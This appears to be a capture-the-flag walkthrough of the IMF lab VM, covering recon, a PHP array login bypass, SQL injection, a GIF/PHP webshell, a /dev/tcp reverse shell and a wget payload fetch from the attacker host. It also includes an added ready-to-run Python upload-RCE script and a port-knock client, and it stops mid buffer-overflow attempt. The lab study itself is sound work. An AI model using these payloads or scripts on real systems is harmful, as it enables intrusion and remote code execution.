Very nice machine! A lot of different techniques are involved.
Finding the target first:
root@kali:~# nmap -Pn -T4 192.168.1.0/24
Nmap scan report for imf.lan (192.168.1.234)
Host is up (0.00037s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)
Then launching a more intensive scan (service and version detection) while I inspect the website. It still shows only port 80:
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF – Homepage
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)
Except for one contact form, not much for now. So let's enumerate:
root@kali:~# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.1.234
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.234
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/18 13:00:36 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/less (Status: 301)
/server-status (Status: 403)
===============================================================
2019/09/18 13:01:40 Finished
===============================================================
root@kali:~# nikto -url http://192.168.1.234
- Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.234
+ Target Hostname: 192.168.1.234
+ Target Port: 80
+ Start Time: 2019-09-18 13:04:33 (GMT0)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2019-09-18 13:05:22 (GMT0) (49 seconds)
—————————————————————————
Checking whether a flag is hidden in the site's images:
root@kali:~/boxes/imf# /root/tools/stegextract/stegextract roundlogo.png
Detected image format: PNG
No trailing data found in file
Performing deep analysis
Done
root@kali:~/boxes/imf# /root/tools/stegextract/stegextract brain.jpg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done
Nothing there, so let's try the contact form with Burp:
POST /contact.php HTTP/1.1
Host: 192.168.1.234
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.234/contact.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Upgrade-Insecure-Requests: 1
email=erik%40erik.com&name=philippe&comments=test+comment
Trying different options but no results for now.
Then I remembered something: the first flag, flag1{YWxsdGhlZmlsZXM=}, is Base64 encoded. Decoded, it gives:
allthefiles
So let's try this:
http://192.168.1.234/allthefiles
Crap, 404 not found!
Changing IP range due to a location change: the target is now 192.168.0.18 and my Kali is 192.168.0.11.
root@kali:~/boxes/imf# dotdotpwn -m http -h 192.168.1.18 -M POST
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# – DotDotPwn v3.0.2 – #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################
[+] Report name: Reports/192.168.1.18_09-19-2019_10-21.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.1.18
[+] Protocol: http
[+] Port: 80
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Traversal Engine DONE ! – Total traversal tests created: 11028
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[+] Fuzz testing finished after 2.15 minutes (129 seconds)
[+] Total Traversals found (so far): 0
[-] Web server (192.168.1.18) didn’t respond !
(Note the address in that command: it targets 192.168.1.18 instead of the new 192.168.0.18, which explains why the server did not respond.)
Let's go back to the first flag, which says allthefiles. I checked the source of the page and found some JS scripts with weird names:
<script src="js/ZmxhZzJ7YVcxbVl.js"></script>
<script src="js/XUnRhVzVwYzNS.js"></script>
<script src="js/eVlYUnZjZz09fQ==.min.js"></script>
The names look like Base64! Concatenating the three fragments gives ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==, which decodes to:
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
Base64 decoded again, it is imfadministrator
So I tried http://192.168.0.18/imfadministrator/ and got a login page!
The source of the page is interesting: I now have a name!
<form method="POST" action="">
<label>Username:</label><input type="text" name="user" value=""><br />
<label>Password:</label><input type="password" name="pass" value=""><br />
<input type="submit" value="Login">
<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->
</form>
Let's see if this can be injected:
sqlmap -u "http://192.168.0.18/imfadministrator" --data "user=erik&pass=password" --dbs --threads=10 --random-agent --dbms mysql
It does not seem injectable, which matches Roger's comment: there is no SQL behind this form.
I tried hydra too, but no result for now.
Let's try roger / test. Interesting: the response differs depending on whether the username exists, so the form can be used to enumerate valid users.
I went back to the contact page and tried the different names I found there. Nothing, until I noticed that Roger's full name is:
Roger S. Michaels
Trying rmichaels gives the other response, so rmichaels is the user.
I can now retry hydra:
root@kali:~/boxes/imf# hydra -l rmichaels -P /usr/share/seclists/Passwords/darkc0de.txt 192.168.0.18 http-post-form "/imfadministrator:user=^USER^&pass=^PASS^:S=302"
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-19 13:56:15
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1471056 login tries (l:1/p:1471056), ~91941 tries per task
[DATA] attacking http-post-form://192.168.0.18:80/imfadministrator:user=^USER^&pass=^PASS^:S=302
[80][http-post-form] host: 192.168.0.18 login: rmichaels password: 017731264n6
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-09-19 13:56:39
The password hydra reports doesn't work: a false positive. S=302 treats any redirect as success, which is too loose a condition for this form.
So the code is in PHP, and per Roger's comment the password is hard-coded rather than checked against a database. After a lot of googling, I found this:
https://stackoverflow.com/questions/1885979/php-get-variable-array-injection
The trick is PHP array injection: sending the parameter as pass[] instead of pass makes $_POST['pass'] an array. The usual cause of the bypass is that strcmp() (and its relatives), when handed an array, returns NULL with only a warning, and NULL == 0 is true under PHP's loose comparison, so a check like strcmp($_POST['pass'], $hardcoded) == 0 passes without knowing the password. (PHP 8 throws a TypeError here instead.)
So I tried it with Burp:
POST /imfadministrator/ HTTP/1.1
Host: 192.168.0.18
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.18/imfadministrator/
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Cookie: PHPSESSID=7colm2p1mfl8ga2tev7ne6rlj0
Connection: close
Upgrade-Insecure-Requests: 1
user=rmichaels&pass[]=
Bingo!
HTTP/1.1 200 OK
Date: Thu, 19 Sep 2019 17:16:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 100
Connection: close
Content-Type: text/html; charset=UTF-8
flag3{Y29udGludWVUT2Ntcw==}<br />Welcome, rmichaels<br /><a href='cms.php?pagename=home'>IMF CMS</a>
The flag decodes to continueTOcms.
Back in Firefox, the CMS has a few pages. The Disavowed list links to a REDACTED image, and Upload Report says it's under construction.
Nothing hidden in the REDACTED image either:
root@kali:~/boxes/imf# /root/tools/stegextract/stegextract redacted.jpg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done
sqlmap --url "http://192.168.0.18/imfadministrator/cms.php?pagename=home" --dump --method POST
The pagename parameter is injectable, and the dump reveals another page in the database (table pages):
http://192.168.0.18/imfadministrator/cms.php?pagename=tutorials-incomplete
There’s a QR Code in the picture: Flag4 !
flag4{dXBsb2Fkcjk0Mi5waHA=}
Decoded, we have: uploadr942.php
I tried to upload a PHP reverse shell:
Intelligence Upload Form
Error: Invalid file type.
So I renamed it to .jpg:
Intelligence Upload Form
Error: CrappyWAF detected malware. Signature: exec function php detected
OK, so the extension check can be fooled, but the content is scanned for known function names. I need to hide my code.
Let's try a GIF header and a webshell without exec():
GIF89a
<?php $cmd=$_GET['cmd']; print(`$cmd`); ?>
I uploaded 1234.gif and it was accepted, but when I browse to the file I get a 404.
So let's look at the response of the upload page:
<html>
<head>
<title>File Uploader</title>
</head>
<body>
<h1>Intelligence Upload Form</h1>
File successfully uploaded.
<!-- 6037118aaa39 --><form id="Upload" action="" enctype="multipart/form-data" method="post">
<p>
<label for="file">File to upload:</label>
<input id="file" type="file" name="file">
</p>
<p>
<input id="submit" type="submit" name="submit" value="Upload">
</p>
</form>
</body>
</html>
It seems the upload was renamed, and the new name is leaked in an HTML comment!
So let's browse to:
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=id
Bingo, I have code execution! The .gif extension does not matter: the uploads directory carries its own .htaccess (visible in the listing below), which presumably tells Apache to run these files through PHP.
With ls%20-al:
GIF89a
total 108
drwxr-xr-x 2 www-data www-data  4096 Sep 20 11:55 .
drwxr-xr-x 4 www-data www-data  4096 Oct 17  2016 ..
-rw-r--r-- 1 www-data www-data    82 Oct 12  2016 .htaccess
-rw-r--r-- 1 www-data www-data    50 Sep 20 11:53 3da1c1eeec42.gif
-rw-r--r-- 1 www-data www-data    50 Sep 20 11:55 6037118aaa39.gif
-rw-r--r-- 1 www-data www-data 83407 Sep 20 11:36 b2634466ab8e.jpg
-rw-r--r-- 1 www-data www-data    28 Oct 12  2016 flag5_abc123def.txt
As you can see, I tried multiple times!
Let's grab the flag first:
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=cat%20flag5_abc123def.txt
flag5{YWdlbnRzZXJ2aWNlcw==}
It decodes to agentservices.
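The upload, rename and command-execution steps above, put together as an added example (my code, not from the post or the IMF box): it builds the GIF/PHP polyglot, checks it against the WAF's exec signature (the other keywords in BLOCKED are assumed), uploads it with a hand-built multipart body using only the standard library, reads the renamed file's name from the HTML comment in the response, and runs a command through it. The URLs follow the paths used above; the optional cookie parameter is an assumption for the case where the upload page requires the admin session.

```python
import re
import urllib.parse
import urllib.request
import uuid

# Constructed copy of the upload response shown above; only the HTML comment matters.
SAMPLE_RESPONSE = """<html><head><title>File Uploader</title></head><body>
<h1>Intelligence Upload Form</h1>
File successfully uploaded.
<!-- 6037118aaa39 --><form id="Upload" action="" enctype="multipart/form-data" method="post">
<input id="file" type="file" name="file"><input id="submit" type="submit" name="submit" value="Upload">
</form></body></html>"""

# Keywords to keep out of the payload. Only "exec" is confirmed by the CrappyWAF
# message above; "system" and "passthru" are assumed extra signatures.
BLOCKED = (b"exec", b"system", b"passthru")


def build_polyglot() -> bytes:
    """GIF magic bytes (to pass the file-type check) followed by the backtick webshell."""
    shell = b"GIF89a\n<?php $cmd=$_GET['cmd']; print(`$cmd`); ?>\n"
    for word in BLOCKED:
        if word in shell.lower():
            raise ValueError("payload contains blocked keyword %r" % word)
    return shell


def extract_upload_name(html: str):
    """Return the 12-hex-character name leaked in the HTML comment, or None if absent."""
    match = re.search(r"<!--\s*([0-9a-f]{12})\s*-->", html)
    return match.group(1) if match else None


def multipart_body(field: str, filename: str, content: bytes, boundary: str) -> bytes:
    """Hand-built multipart/form-data body: the file part plus the 'submit' field of the form."""
    parts = [
        b"--" + boundary.encode(),
        ('Content-Disposition: form-data; name="%s"; filename="%s"' % (field, filename)).encode(),
        b"Content-Type: image/gif",
        b"",
        content,
        b"--" + boundary.encode(),
        b'Content-Disposition: form-data; name="submit"',
        b"",
        b"Upload",
        b"--" + boundary.encode() + b"--",
        b"",
    ]
    return b"\r\n".join(parts)


def strip_gif_header(out: bytes) -> bytes:
    """The webshell echoes its own GIF89a header before the command output; drop it."""
    if out.startswith(b"GIF89a"):
        out = out[len(b"GIF89a"):]
    return out.lstrip(b"\r\n")


def upload_and_run(base: str, cmd: str, cookie: str = None) -> str:
    """Upload the polyglot, learn its new name from the response, then execute cmd through it."""
    boundary = "----imf" + uuid.uuid4().hex
    body = multipart_body("file", uuid.uuid4().hex[:8] + ".gif", build_polyglot(), boundary)
    req = urllib.request.Request(base + "/uploadr942.php", data=body, method="POST")
    req.add_header("Content-Type", "multipart/form-data; boundary=" + boundary)
    if cookie:  # assumed: e.g. "PHPSESSID=..." if the upload page needs the admin session
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=10) as resp:
        name = extract_upload_name(resp.read().decode("utf-8", "replace"))
    if name is None:
        raise RuntimeError("upload response did not contain the renamed file")
    url = "%s/uploads/%s.gif?cmd=%s" % (base, name, urllib.parse.quote(cmd))
    with urllib.request.urlopen(url, timeout=10) as resp:
        return strip_gif_header(resp.read()).decode("utf-8", "replace")


if __name__ == "__main__":
    import sys
    # Usage: python3 upload_rce.py http://192.168.0.18/imfadministrator 'id' [PHPSESSID=...]
    print(upload_and_run(sys.argv[1], sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else None))
```

The name check is deliberately strict (exactly 12 lowercase hex characters, as in the response above); if the box ever changed its naming scheme, extract_upload_name returns None and the script stops instead of guessing a URL.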
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=%75%6e%61%6d%65%20%2d%61
GIF89aLinux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Now let's try a reverse shell:
/bin/sh -i >& /dev/tcp/192.168.0.11/8080 0>&1
URL encoded:
%2f%62%69%6e%2f%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%30%2e%31%31%2f%38%30%38%30%20%30%3e%26%31
Didn't work! In hindsight that is expected: PHP backticks run the command through /bin/sh, which on Ubuntu is dash, and both >& and /dev/tcp are bash-only features. Wrapping the command in bash -c '...' would avoid this.
Let's try differently, with the PHP reverse shell from pentestmonkey.
I started an HTTP server on Kali:
python -m SimpleHTTPServer 9000
Then on the target, fetched the shell through the webshell (it lands in the uploads directory, the working directory of the PHP script):
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=wget%20192.168.0.11:9000/reverse2.php
Then on Kali, start netcat:
nc -nvlp 4444
Then browse to the uploaded shell on the target:
http://192.168.0.18/imfadministrator/uploads/reverse2.php
Bingo! A shell!
root@kali:~/tools/shells# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.18] 53416
Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
13:03:49 up 24 min, 0 users, load average: 0.15, 0.11, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
Now upgrading to a proper TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL-Z
stty raw -echo
fg, then ENTER twice
export TERM=screen
reset
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
setup:x:1000:1000:setup,,,:/home/setup:/bin/bash
Let's go back to the website for now to look for passwords. In index.php I found the hard-coded password for rmichaels:
398fj289fj2389fj398fjhhds^&#hkseifw3893h#(&$$*838hjf
But rmichaels is not in /etc/passwd, so it is of no use on the system.
Uploading LinEnum on the target, then running it (the first wget fails because my HTTP server listens on port 9000, not 80):
$ wget http://192.168.0.11/linenum.sh
--2019-09-23 07:45:31--  http://192.168.0.11/linenum.sh
Connecting to 192.168.0.11:80... failed: Connection refused.
$ wget http://192.168.0.11:9000/linenum.sh
--2019-09-23 07:45:45--  http://192.168.0.11:9000/linenum.sh
Connecting to 192.168.0.11:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: 'linenum.sh'
0K .......... .......... .......... .......... ....  100%  132K=0.3s
2019-09-23 07:45:45 (132 KB/s) - 'linenum.sh' saved [45652/45652]
$ chmod +x linenum.sh
$ ./linenum.sh -t > scan.txt
### SYSTEM ##############################################
[-] Kernel information:
Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x8
6_64 x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.4.0-45-generic (buildd@lgw01-34) (gcc version 5.4.0 20160609 (Ub
untu 5.4.0-6ubuntu1~16.04.2) ) #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
NAME="Ubuntu"
VERSION="16.04.1 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.1 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
Checking exploit-db for a matching kernel exploit.
Tried: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
Not working.
An interesting process is running as root:
root 1086 2.8 0.2 8752 2196 ? Ss 07:39 0:12 /usr/sbin/knockd -d
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:7788 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN –
tcp6 0 0 :::80 :::* LISTEN –
tcp6 0 0 :::22 :::* LISTEN –
knockd is a port-knocking daemon, so something is probably only exposed after the right knock sequence. The problem is that I cannot read its configuration:
knockd -l
/etc/knockd.conf: Permission denied
Port 7788 from the listening sockets is an xinetd service, running /usr/local/bin/agent as root:
www-data@imf:/etc/xinetd.d$ cat agent
# default: on
# description: The agent server serves agent sessions
# unencrypted agentid for authentication.
service agent
{
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/local/bin/agent
log_on_failure += USERID
disable = no
port = 7788
}
Actually, if I telnet to port 7788 I get something!
telnet localhost 7788
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID :
But I cannot log in without a valid Agent ID.
Checking the program behind the service:
www-data@imf:/usr/local/bin$ ll
total 24
drwxr-xr-x  2 root root  4096 Oct 16  2016 .
drwxr-xr-x 10 root root  4096 Sep 22  2016 ..
-rw-r--r--  1 root root    19 Oct 16  2016 access_codes
-rwxr-xr-x  1 root root 11896 Oct 12  2016 agent
www-data@imf:/usr/local/bin$ cat access_codes
SYN 7482,8279,9467
I might have the knock sequence here! Sending a SYN to each of these ports:
nmap -sS --max-retries 0 -T5 -p 7482,8279,9467 192.168.0.18
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 13:53 UTC
Warning: 192.168.0.18 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.0.18
Host is up (0.00043s latency).
PORT STATE SERVICE
7482/tcp filtered unknown
8279/tcp filtered unknown
9467/tcp filtered unknown
The ports show as filtered, as expected; the SYNs themselves are what knockd looks for. Now rescanning the target, all ports this time:
root@kali:~/boxes/imf# nmap -p- 192.168.0.18
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 13:54 UTC
Nmap scan report for 192.168.0.18
Host is up (0.00049s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
7788/tcp open unknown
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)
But it just shows what I already had access to from inside the box, so I moved on. Two things worth knowing here: the earlier scans did not cover all 65535 ports, so these results cannot tell whether the knock actually changed anything (nmap -p 7788 before and after the knock would settle it), and nmap randomizes port order unless -r is given, so a knock sequence should be sent with -r to guarantee the order.
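A knock client that does the same thing without nmap, added here as an example (my code, not the post's): it parses the access_codes line, sends the SYNs in the given order using plain TCP connects (no root needed, and the order is guaranteed), and checks whether the target port is reachable before and after, which is the test missing from the scans above. The 0.3 s delay and 0.5 s timeout are assumptions about knockd's sequence window.

```python
import socket
import time


def parse_access_codes(text: str):
    """Turn a line like 'SYN 7482,8279,9467' into ('SYN', [7482, 8279, 9467])."""
    fields = text.split()
    if len(fields) != 2:
        raise ValueError("expected '<FLAG> <port,port,...>', got %r" % text)
    flag, port_list = fields[0].upper(), fields[1]
    ports = [int(p) for p in port_list.split(",") if p.strip()]
    if not ports or any(not 1 <= p <= 65535 for p in ports):
        raise ValueError("bad port list: %r" % port_list)
    return flag, ports


def knock(host: str, ports, delay: float = 0.3, timeout: float = 0.5) -> None:
    """Send one SYN per port, in order.

    A plain connect() to a filtered port emits the SYN and then just times out; that SYN is
    all knockd needs to see. The short timeout keeps the kernel from retransmitting (the first
    SYN retry happens after about a second) and keeps the whole sequence inside knockd's
    seq_timeout window (assumed to be a few seconds).
    """
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            pass  # timeout or refused is the expected outcome on a knock port
        finally:
            s.close()
        time.sleep(delay)


def port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """True if a full TCP handshake to host:port completes."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def knock_and_check(host: str, codes_line: str, target_port: int):
    """Knock with the access_codes sequence; report reachability of target_port before and after."""
    flag, ports = parse_access_codes(codes_line)
    if flag != "SYN":
        raise ValueError("only SYN (TCP connect) knocks are implemented, got %s" % flag)
    before = port_open(host, target_port)
    knock(host, ports)
    after = port_open(host, target_port)
    return before, after


if __name__ == "__main__":
    import sys
    # Usage: python3 knock.py 192.168.0.18 "SYN 7482,8279,9467" 7788
    before, after = knock_and_check(sys.argv[1], sys.argv[2], int(sys.argv[3]))
    print("port %s open before knock: %s, after knock: %s" % (sys.argv[3], before, after))
```

If before and after are both True, the port was never filtered for you and the knock is irrelevant; if both are False, either the sequence, the flag type or the timing is wrong (knockd also accepts UDP knocks and specific TCP flags, which this client does not send).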
Going back to agent. I tried to transfer it to my Kali with a Python HTTP server but somehow that didn't work, so I copied it into the web root and downloaded it through the browser:
cp agent /var/www/html/imfadministrator/uploads
Now trying to reverse it.
I ran it in EDB and set a breakpoint where the Agent ID is evaluated; the expected value is sitting on the stack: 48093572
I tried it on the target, and it worked!
www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection:
Extraction Points:
Staatsoper, Vienna, Austria
Blenheim Palace, Woodstock, Oxfordshire, England, UK
Great Windmill Street, Soho, London, England, UK
Fawley Power Station, Southampton, England, UK
Underground Station U4 Schottenring, Vienna, Austria
Old Town Square, Old Town, Prague, Czech Republic
Drake Hotel – 140 E. Walton Pl., Near North Side, Chicago, Illinois, USA
Ashton Park, Mosman, Sydney, New South Wales, Australia
Argyle Place, The Rocks, Sydney, New South Wales, Australia
www-data@imf:/usr/local/bin$ 2
2: command not found
www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 2
Extraction Request
Enter extraction location: Underground Station U4 Schottenring, Vienna, Austria
e
Location: Underground Station U4 Schottenring, Vienna, Austria
Extraction team has been deployed.
www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3
Enter report update: 1234
Report: 1234
Submitted for review.
Trying a buffer overflow on the Submit Report input.
First thing, disable ASLR on the analysis box (needs root):
echo 0 > /proc/sys/kernel/randomize_va_space
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3
Enter report update: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
